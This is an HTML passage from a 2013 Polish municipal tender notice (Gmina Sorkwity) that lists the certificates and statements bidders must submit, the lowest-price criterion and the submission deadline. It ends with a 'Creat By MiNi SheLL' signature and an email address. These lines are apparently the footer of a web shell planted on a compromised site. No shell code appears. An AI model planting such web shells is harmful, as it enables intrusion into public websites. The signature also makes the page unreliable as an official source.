<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz oferty - załącznik Nr 1 do specyfikacji istotnych warunków zamówienia, 
2. W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy wykonawcy mogą złożyć w formie: 
a) oświadczenia podpisanego przez Lidera,
b)oświadczeń podpisanych przez każdego z wykonawców wspólnie ubiegających       o udzielenie zamówienia,
c) wspólnego oświadczenia podpisanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia,
a oświadczenie i dokumenty wymienione w pkt. 2, potwierdzające, że wykonawca    nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy składa każdy z wykonawców oddzielnie.
3. Wzór umowy załącznik Nr 6 do specyfikacji istotnych warunków zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/sorkwity_gmina_wiejska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sorkwity 11-731 Sorkwity, ul. Olsztyńska 16 A, pok nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 10:00, miejsce: Urząd Gminy Sorkwity 11-731 Sorkwity, ul. Olsztyńska 16 A, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com